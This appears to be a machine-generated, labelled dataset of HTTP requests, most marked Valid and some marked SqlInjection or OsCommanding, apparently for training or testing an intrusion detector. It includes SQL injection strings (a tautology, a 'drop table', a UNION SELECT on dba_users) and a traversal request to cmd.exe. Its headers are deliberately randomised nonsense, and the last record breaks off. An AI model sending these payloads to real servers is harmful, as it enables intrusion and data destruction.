X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47854
Start - Id: 9970
class: Valid
GET /sdr8ritesoe/ep3.swf? HTTP/1.1
Host: 79.81.14.132
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.5, x-mac-icelandic, iso-8859-4, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=955
Client-ip: 87.178.167.178
Cookie: eyodEiaomdMx=shLUbPAdE7@;w9teyecos=wjaHWUjCOAo5;7ivmr1uh=2986973675;8ein=ie;e4eoet7r6i0=43
Cookie2: $Version="5"
Date: Mon, 05 Jul 04 13:47:48 CET
ETag: "j1OgriGRt792lU3"
Expect: rhteamu
From: gaacps@toci.org
If-Modified-Since: Fri, 21 Apr 06 12:38:39 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:51:21 CET
If-Match: "aImShzvNPmrzCa48"
If-None-Match: "rRfOX4VCF7z6t6FzU"
If-Range: Fri, 27 Feb 04 21:49:48 UTC
Max-Forwards: 142
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="aBlthht"
Range: -96
Referer: /beah/1AYyntod.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 6.4; lb-ps; rv:1.0.4) Gecko/82128964
UA-CPU: MIPS
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 596x007
Via: HTTP/7.9 www.oknKd.htm, 3.5 www.ryacg7F.htm:281
Transfer-Encoding: identity
Upgrade: b2bhql/3.8
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 7198158285326670
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9970
Start - Id: 41493
class: SqlInjection
PUT /Ewsrv/PeW6sHcopyKEXhttpsFlibsA/o8_2-iO8I_@Gc/iiLm7P4ByP/bKbOERPO/andABJmideXG/3rTtuto/s.QF1i/Z-bx/ronwteq/Lei9oanaI3sioGbau6bA.cgi? HTTP/1.1
Content-Length: 82
Content-Language: aln,ets,g5tL
Content-Encoding: identity
Content-Location: /ttsrEns/idhe/o0t7/itnapiub.html
Content-MD5: cnR0aTRhQXN6c2l6Y2F0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Sep 09 16:47:20 UTC
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.nmsdtton.org:73534
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-E;q=0.7, ttd-SE, niAs-smNi;q=0.2, wz7Ti3v-a, ksisr-7fte
Cache-Control: 0t=earavcoq
Client-ip: 221.158.6.21
Cookie: ljqel2368koxtd=hveghEswnnd2agte;Flnm0ter0=60173;aiLMGAhttp=6mu
Cookie2: $Version="965"
Date: Tue, 22 Nov 05 06:45:04 CET
ETag: W/"yb6XrfzwffC.Ke8rnPCg"
Expect: maEbbf
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Fri, 16 Oct 09 14:54:59 GMT
If-Match: *
If-None-Match: "M510Q-6cxIeb7POqq"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: http://www.aorei.cz/o7es4.css
TE: deflate;q=0.9,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 9.5; te-v1; rv:7.8.5) Gecko/20899907
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.8 www.d5tse.gif, FTP/4.2 www.umdstie.png:493, amtl/0.0 94.148.9.155:603
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fprocessing-instructionqmnkE='    /**/  OR /**/   'oo'    >   'S

End - Id: 41493
Start - Id: 29733
class: Valid
GET /tiienetjO/ih8Rbl3piEodsoi43nda/nS9G-phUXqf6Z6/3andmailEvB5G13/lC-cqj/u0.mspx?ejmlcb=2An91aG6AdomochamaHi&oLtmTixoeW0t=310&OnhTynBm=80039507&l9setfkzh=+yeG&srnugu=76261349&ner=nbnBCM&ttgfesb=c%40lCrtn&arbdmeah4=rhttp&QWUcmd5P=636161000&jjnrAoeedcia=44 HTTP/1.1
Host: 190.7.181.215
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-4;q=0.5, us-ascii, iso-8859-6;q=0.2, x-mac-cyrillic;q=0.1
Accept-Encoding: deflate;q=0.8, gzip, identity;q=0.2, gzip, identity;q=0.4
Accept-Language: hhe3g8-a77Nhes;q=0.9
Cache-Control: min-fresh=23
Client-ip: 58.183.91.158
Cookie: ee7ojaeom0e=02areeieknl;uOnisrtdsuti=>nntemgOsopeyc
Cookie2: $Version="2"
Date: Sun, 18 Apr 04 05:36:58 GMT
ETag: "XL@wdCoPY8-Rem3gz"
Expect: chxFad
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Sun, 20 Aug 06 01:43:42 UTC
If-Unmodified-Since: Wed, 22 Jul 09 23:38:55 GMT
If-Match: "qxGUmTULMJm-RPwZDn"
If-None-Match: *
If-Range: Tue, 22 Nov 05 20:21:51 CET
Max-Forwards: 8
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ronlIe iihoIE=hrOros
Range: -6
Referer: http://www.uA9al.fr/SeaAadTO/wahqcoP/eosnedh/hIeRrrii.gif
TE: gzip
Trailer: Accept-Encoding
User-Agent: dIeir/2.8.1
UA-CPU: MIPS
UA-Disp: 9135,374,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1488x053
Via: HTTP/0.4 2.164.37.243
Transfer-Encoding: lrrjns
Upgrade: knd/2.6, o76/7.6, h3vr6n/5.2, odTt/7.9
Warning: 115 www.s3ub.html "rhndhdihiimuIsehs" 
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 23055692041391368156
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29733
Start - Id: 5691
class: Valid
POST /rstlwg3eyntdrroai/eeabeuee/sVj2uU6k5Dfg0JA3cs/brahf8ihrwvfhherUeuu.msf? HTTP/1.1
Content-Length: 217
Content-Language: hhnast,halojw,wcxn
Content-Encoding: identity
Content-Location: /lles/tonud/edPehair/mefstd/uwtnmd.msf
Content-MD5: OXRvcGdyZG0xQW9zZHNrYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 04 06:27:47 GMT
Last-Modified: Sun, 08 May 05 24:12:57 GMT
Host: 164.57.65.99
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, deflate;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 5.75.102.21
Cookie: dalauLk=0;secepe=94627
Cookie2: $Version="0"
Date: Fri, 30 Mar 07 21:09:23 UTC
ETag: W/"ej45.ZU.aBh9ECAGlQL"
Expect: 100-continue
From: jdYeaesr@naae.de
If-Modified-Since: Wed, 30 Apr 08 12:05:48 CET
If-Unmodified-Since: Thu, 20 May 04 16:24:13 GMT
If-Match: "bsGIXjRnnVtFn47"
If-None-Match: "yZiIFTe3epyA-Hha5"
If-Range: "YSF6eNoNEwwWA7LOqh"
Max-Forwards: 315
MIME-Version: 1.4
Pragma: b=d9e
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Basic aXR0ZTo5eGlk
Range: 2179-017332,977-12
Referer: /eniN6zs/umtr4o.bin
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/5.9 (X11; U; Linux i586 5.6; RO-5n; rv:3.9.8) Gecko/72973728
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 327x1132
Via: 4.7 34.89.22.104
Transfer-Encoding: gzip
Upgrade: roUhpa/5.9, slqpF/4.7, scIo/2.0
Warning: 214 www.32y8re.png "fuadutamienNmaN2eaon" 
X-Forwarded-For: 161.194.150.26
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wagpiebobotpu=0=&ero8csMrslnnve=8DaeniWiformtc]o@ex&abtti35n=oFdcre2zdsrFhko&ktgsStifg=znias&form4jLo.=hatbesAe&hiEpeZoFoyS=cbUcrsboselectaae&bg1ecrtkzNzetea=tnedM?ef n&re=29898543&ousf=4384156661&on0grsEaw5=s

End - Id: 5691
Start - Id: 7471
class: Valid
POST /@i1http2YT/3eutoegnLtil/dssfwinesnpsc/Zrtzdeesaha/bnaOdc/nUAjXtkciAU.png? HTTP/1.1
Content-Length: 11
Content-Language: iaB
Content-Encoding: deflate
Content-Location: http://www.siurnr.st/ihqi/Ekbsnew/sh6s/epae/47intett.cfm
Content-MD5: ZG9pajdpbmhRb3RkYWVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 May 09 18:40:46 GMT
Last-Modified: Mon, 14 Jul 08 01:52:35 CET
Host: www.r4owf.de:80
Connection: keep-alive
Accept: image/*;q=0.4, audio/basic;q=0.3, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.214.248.237
Cookie: mywwtkt4eBnc=d;dX@m=55609715;hLxterm1=rribl tt;flta=hzgaaheettama
Cookie2: $Version="923"
Date: Sat, 03 Feb 07 16:26:26 UTC
ETag: "XItDTO9.TSjKUBv1"
Expect: oOhnhs
From: nx7o@olnt1.uk
If-Modified-Since: Fri, 01 Sep 06 15:55:26 GMT
If-Unmodified-Since: Fri, 13 Feb 04 07:48:30 GMT
If-Match: "N0I8q0Ok2yG5IKGt9Q"
If-None-Match: "f7s5J.Psrh02xy5A6Yj"
If-Range: Sun, 12 Sep 04 14:03:27 UTC
Max-Forwards: 4109
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic RElSZToxYTNlOQ==
Authorization: hctei ieIio=n3eiXt4t
Range: 0407-
Referer: http://www.Hyaed.it/o20t/nrlro/SZmiee/t8Sshi/6rme7ij.jpeg
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: eYcCFu http://www.enUpmha.biz
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 061x614
Via: s531/3.5 www.thGveC.gif
Transfer-Encoding: deflate
Upgrade: omrin/0.6
Warning: 177 www.a7afEsZ.js "b2loadjpr" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 68240
----: ---------------
~~~~~: ~~~~~~~~~~~~~

C5ei=a8logC

End - Id: 7471
Start - Id: 28230
class: Valid
GET /Ionctnafh/rRL@2nF/tE6ewebteiwhun/llaLctsxer/3jO6X-nj@ubNh2DpI/eRgagkb.php4?eg4enwbhyuge=910&m3ga68urxe=aqenG9oanemeew&p3qirlwocottae=ns2nxvt1t%3CB%28leat9&RuWndr=2005660&gR=et6&cd3seglreiqt=eoeg&daacw=l+snReNntnh HTTP/1.1
Host: www.8gnnsen.biz
Connection: close
Accept: */*
Accept-Charset: euc-jp, x-mac-chinesesimp;q=0.8
Accept-Encoding: *
Accept-Language: tc-eye, ho2wso-eto05i;q=0.6, e6-c1, unw-3nee;q=0.7
Cache-Control: Icl=ttrweaeu
Client-ip: 118.186.42.37
Cookie: pn=53925578;eh0Rjp=a0tosystemaips %ehrll[sl
Cookie2: $Version="3"
Date: Thu, 30 Jul 09 17:41:02 CET
ETag: "QEJBBybmVqmATZlH6iN"
Expect: eSmks
From: Rvnem7Ei@tyundflr.fr
If-Modified-Since: Fri, 16 Apr 04 18:07:21 GMT
If-Unmodified-Since: Wed, 20 Aug 08 22:26:55 UTC
If-Match: *
If-None-Match: "hHzMd9vRQUkF_nHZeqRj"
If-Range: Mon, 19 Jun 06 03:30:19 CET
Max-Forwards: 2
MIME-Version: 3.4
Pragma: mrEts=ndV0izn
Proxy-Authorization: Basic dGloZXJ5OnNlblU=
Authorization: NTLM aGlzZXF0c1NibW5peWt0cDhwamF1cWNSb3hobmpkc1RyZWRnN2d0YW9iRW5u
Range: -8783
Referer: /nsei/i40enz3/nhikbtt/eglo/ztn2emt.swf
TE: gzip,chunked
Trailer: If-Modified-Since
User-Agent: niaA_b http://www.twhedAeh.ch
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: iNntej/9.7 140.0.44.46
Transfer-Encoding: cehw
Upgrade: uOiar/2.7, NgZ73n/8.2, sDhb/6.3, oeA/4.9
Warning: 575 234.57.8.95 "hhitit" "Tue, 16 May 06 20:58:58 CET"
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 144317661774202
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28230
Start - Id: 11220
class: Valid
GET /becoEy4th/t38jmdmypcrna/asplmyzrcoleta/j0NTbEqFa2FuNRQ/kssTSeUw0_IDykrzf.xa/Pm.tiff?iorioo=601751520&eUisdemsauCw=cnodea&9kincludeXQLfE=%5Bwr&nlsnmnrhl=tfdO&nze69nomo=nwdn&bcmbxnmohu=301 HTTP/1.1
Host: 123.25.142.181:99
Connection: close
Accept: video/quicktime
Accept-Charset: windows-874, x-mac-roman;q=0.2, windows-1252;q=0.7, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 191.102.129.160
Cookie: otboukyzoh=4FY0rT4aLhr;d0haeiaeee=ou;6C8AIlRAfFC=399893;Wt9t8t6athsd=8qtGl2eHHw;pgcapiAfscttao=ntMnadyssniz
Cookie2: $Version="795"
Date: Sat, 11 Mar 06 05:04:31 GMT
ETag: W/"pKRNQphTAYjN-84"
Expect: 100-continue
From: hPiep@ahrdo9ea.uk
If-Modified-Since: Tue, 24 Oct 06 13:01:53 GMT
If-Unmodified-Since: Tue, 03 Apr 07 19:14:41 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Jun 08 04:12:20 GMT
Max-Forwards: 10
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: isrts ieloau=saeo
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: /ufl9tYq/ilsateee/oaa0iR5o/yQbeis32.gif
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/8.5 (compatible; MSIE 6.4; Open BSD i586; otorcv; Beroo; 8tohlae1hc)
UA-CPU: 68000
UA-Disp: 7122,239,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 689x7201
Via: 3.5 166.35.106.240:549
Transfer-Encoding: identity
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11220
Start - Id: 35129
class: SqlInjection
PUT /etoTp4Dztee/nco/LwCV8X1/6eaaceiW/iA8tlienoEoilefa/gty/bjg2Rf2erisvete/nhwG/efptne.msf? HTTP/1.0
Content-Length: 60
Content-Language: llerH,om
Content-Encoding: deflate
Content-Location: /aopihe8z/Csuw1u/8baKt2/snArhgrt.jpg
Content-MD5: cnJsZW5ycm5ab0NycmVoaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Feb 04 10:39:52 UTC
Last-Modified: Tue, 03 Oct 06 22:30:38 UTC
Host: 228.126.63.19:80
Connection: htC9nTo
Accept: */*
Accept-Charset: windows-1257, euc-tw, windows-874;q=0.4, iso-10646-ucs-2, us-ascii;q=0.0
Accept-Encoding: deflate;q=0.4, gzip
Accept-Language: Pvcs-brgoR;q=0.3, atasva2z-p;q=0.5, qe-ctid6f;q=0.3, edarqa-rxe;q=0.6
Cache-Control: yjLa=y
Client-ip: 86.214.16.25
Cookie: n2p=4nnnEtkh8owmmEtnx;es=y3l/-e$1ctcvarel;eqQ_-F=b6BiL;nvwp5c=8<etc
Cookie2: $Version="43"
Date: Fri, 03 Nov 06 05:13:58 CET
ETag: "wECWPXUQhi-PB9N"
Expect: 100-continue
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 8
MIME-Version: 6.8
Pragma: e='ftji'
Proxy-Authorization: Digest cnonce="cejy"
Authorization: Basic ZXZzbDpybjNuYm5l
Range: 9644-,893-04607,798896-
Referer: /Ss7b/dsaiueLa.php3
TE: trailers,trailers,deflate
User-Agent: jaTf6dnyT39en
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

stAsddc5=';    drop   table     eayystt&clTEhxtIt9fA=|

End - Id: 35129
Start - Id: 7970
class: Valid
POST /Sunn/e65nDgtJStU.html? HTTP/1.1
Content-Length: 191
Content-Language: Qlqhtue,e7
Content-Encoding: deflate
Content-Location: http://vrbii6cd.it/hdfne.php3
Content-MD5: Z2RxTm5lN2FlcnQ3UXVFbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Feb 07 14:01:10 UTC
Last-Modified: Fri, 23 Dec 05 02:56:43 CET
Host: 170.250.134.188
Connection: close
Accept: video/*;q=0.7, application/x-tar;q=0.4
Accept-Charset: euc-jp
Accept-Encoding: 
Accept-Language: giLr-slrssntu;q=0.5, agh-ms;q=0.2, foF3-rPnrgse
Cache-Control: only-if-cached
Client-ip: 163.108.182.17
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="034"
Date: Tue, 27 Jun 06 16:28:51 UTC
ETag: "48bdU5dR6znX_hvh0Dm0"
Expect: 100-continue
From: eedf0au@eYilizod8t.de
If-Modified-Since: Sun, 05 Aug 07 12:01:16 UTC
If-Unmodified-Since: Fri, 11 Apr 08 01:51:41 CET
If-Match: *
If-None-Match: "E@CeRKIdnKoyNa6n"
If-Range: "bO4smO9q_DIDByPWQFr"
Max-Forwards: 912
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -607
Referer: /s6ucthix.jsp
TE: trailers,gzip,deflate;q=0.6
Trailer: Transfer-Encoding
User-Agent: wQufhzx http://www.ildwt8l.ch
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 0.0 www.ieeur.tiff
Transfer-Encoding: compress
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

hoedyr8eb=oeerteeaE&Eio=zelIib&eOttaw3anst4cui=0219&rcpJjrcpsXhoIwW=ajFbUvEn&vtmpTYDC=ee8tNhaxyen&Minput6A9htpass=199448&j.gVewv=eOfi.THYAo&aRrl6r8=8492258243&lu7eagttdWnElfk=tn4eYggmruOsmbOa

End - Id: 7970
Start - Id: 43715
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: www.hshm.net
Connection: keep-alive
Accept: audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress, compress;q=0.1, identity
Accept-Language: eitpp-9traae5e;q=0.9, y-8tNasti5, 3roBd-eiet
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Tue, 27 Feb 07 24:43:12 GMT
ETag: "g7TqcrEINpWOQLW.S"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Tue, 01 May 07 20:25:46 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:46:01 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: e3dad='NaeAqel'
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: Digest qop=13drn
Range: 7008-71
Referer: /oehrd/ulmh7e9d/isnjno/lltef34c/ma8t.pl
TE: gzip,deflate
User-Agent: n4l5frregiNtqtr
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 4ie/3.2 19.170.182.11, 7.3 60.63.115.197
Transfer-Encoding: mnnhta
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43715
Start - Id: 28773
class: Valid
GET /d040t.OpIS/8seaztT6IprlymU.css?adenotgrshz=having%3Dh%2B4tuniongr&reamEnsBk=oqcn4mm8Bosaek1b HTTP/1.0
Host: 173.156.192.42
Connection: x4ucnabh
Accept: image/png;q=0.7, application/*;q=0.4, audio/x-wav;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: t6='Mwoba'
Client-ip: 218.215.31.98
Cookie: ninc=DfBl;i9hiDrj=37489033;roe245aohiehf=aysehhtacceshtacces staldwide:te
Cookie2: $Version="70"
Date: Thu, 08 Apr 04 22:16:18 UTC
ETag: "rHk7h3zz@PuTHBWKwI"
Expect: toank8Io=hSDy
From: yrrE0@eR1rsh.ch
If-Modified-Since: Sat, 16 Oct 04 07:48:28 GMT
If-Unmodified-Since: Wed, 22 Oct 08 14:53:57 UTC
If-Match: "rbXg8@@UEcHlZXYijROZ"
If-None-Match: *
If-Range: "oyo_z30SeXUkDQbjW"
Max-Forwards: 58
MIME-Version: 4.4
Pragma: o=9eWt2eTi
Proxy-Authorization: NTLM amM2ZnVhaHVldDJ0b1hzZUEyY2FqT3JzZW9udHlib3RkczA5
Authorization: apixh7 letbs3nf=Paqmro1
Range: -20
Referer: /Wlhsjlh/luqAf/tnee4lk2.php
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: n7Zxh2pC1 http://www.hwith.be
UA-CPU: x86
UA-Disp: 6540,3591,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5260x374
Via: 1.7 www.nlho.png
Transfer-Encoding: identity
Upgrade: lwsi/8.0, kwn0/1.2
Warning: 263 www.orehreth.jpg "pIt9" "Wed, 11 Jul 07 24:19:28 CET"
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 1712433287258
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28773
Start - Id: 23224
class: Valid
GET /enrlaw.css?tr9rw=+Lkdkt%24hrOaoibqRn&7nhlanagi3n=5&eev0oaioa=2137&2rsdtaehelq=qloqePe%24k&Iddaki=leT+g+lmetadte&lqasE=vnrOs1iUB&cS2et=%3ElitFreh1%5Baml%40ttl&EXcbI=Ltmpform HTTP/1.1
Host: 204.186.200.196:633
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, gzip;q=0.8, deflate
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 241.162.214.135
Cookie: ewazny3dhrbnt=slryyt;iznjegVdnsn=Raa;maioa=utwsock_streama9h;atoulmswhoh7=soLo3Cud
Cookie2: $Version="5"
Date: Sun, 14 Jan 07 12:59:51 UTC
ETag: "v.gM9qmtiHYDT5vW"
Expect: 100-continue
From: aomoui@he6m.net
If-Modified-Since: Sun, 13 Sep 09 18:39:57 GMT
If-Unmodified-Since: Tue, 26 Apr 05 14:57:37 GMT
If-Match: "skgyOYZI7-GOCT@L5"
If-None-Match: *
If-Range: *
Max-Forwards: 478
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aGllZGFvd2FuYTRvbGxvYklhZFhpN2VhY2hybHRUc25sN295cnlsaWVza283
Range: 209-,55-
Referer: http://soktz.cz/itelon/maoqrsu0/pErbn9hm/Tesxre/zesr.cgi
TE: gzip;q=0.4,trailers
Trailer: Via
User-Agent: riVxSBqmNb http://www.elcdrdt.de
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 973x7584
Via: HTTP/8.1 www.vrs9tNpl.tiff:2, sEs/5.9 193.236.23.253:4, uehuji/8.1 36.180.190.148
Transfer-Encoding: identity
Upgrade: ic7/9.0, xiebw/0.3, pdyeUH/1.9, 94kno/7.1, uMr/6.8
Warning: 866 www.iesEfey.jpg:21695 "zbyenndTms" "Fri, 26 Sep 08 08:03:01 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 9726059
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23224
Start - Id: 22934
class: Valid
GET /rLenuZk2Vj/tckyZ9/s.ommAGRkpXP/wlHtInull/eeekdeshnayuoro/aLPYl_7c7x79jw5y/em/7pL10N0m.html?aashsi7an=eEeSoasu9cdivsnnfyaa&LQ0F@8e=e3oJBfOkDM&ogaelYx8psjnqd=e7inaswRitzahn&tshctoeejec=4nhiesniu&d0emytpavshoaed=c2ISgtA&oivystuf=62590035&O8XF9qOtuLg=stimo&bvdtamsihfti=deletev&wekxwHlra=806&ty=geoy HTTP/1.1
Host: 166.14.52.85
Connection: kdratoe
Accept: application/zip;q=0.1, image/gif;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4, deflate;q=0.3
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 53.69.199.207
Cookie: CnEtestexroehp=2992;izG-libHai=~ne)-;notnmjTht=/7@?la=/bniowhereD Nt;JNC3=350
Cookie2: $Version="24"
Date: Tue, 28 Jun 05 19:43:10 CET
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: c9U4=dtl8rty
From: 9ennRe0@diEo.fr
If-Modified-Since: Mon, 22 Jun 09 24:46:38 CET
If-Unmodified-Since: Wed, 18 Feb 09 10:32:39 GMT
If-Match: "fYV@Js933u9Ccdn6dMFV"
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: Sun, 06 Jan 08 10:17:46 UTC
Max-Forwards: 89
MIME-Version: 1.1
Pragma: i=metzs
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: sh5fa tirnAf=mhRn3M
Range: 3828-,508-92
Referer: http://oTenu.com/5xooned1.asp
TE: trailers,chunked
Trailer: Transfer-Encoding
User-Agent: tPOlnYabutDiai53iapt
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: HTTP/7.3 www.atdGKPe6.jpg, 2.3 www.0ss0.css
Transfer-Encoding: identity
Upgrade: bey/2.9, ttdnH/6.2, Mue9/1.0, jecyw/5.5, 1dic/2.5
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22934
Start - Id: 42492
class: SqlInjection
GET /VGGGW/oeAy/SfE9XDDQGDEDRo/b7FAlbw95_VI0.php3?ast2z4qei=chairs%27++++UN%2F**%2FION+SEL%2F**%2FECT+++++ih+FROM+++dba_users+++WHERE++++nrOrjrc+++like+++++%27%2525 HTTP/1.1
Host: www.falbeisEpj.gov:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 215.176.56.170
Cookie: ti5usa=e3$&5hrm;al=a06C;56CJMe0@0=nmw/7iurestdin;2n3dtqioyco=28181;ot=216
Cookie2: $Version="2"
Date: Tue, 16 Aug 05 12:16:33 GMT
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sat, 13 Dec 08 22:31:16 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
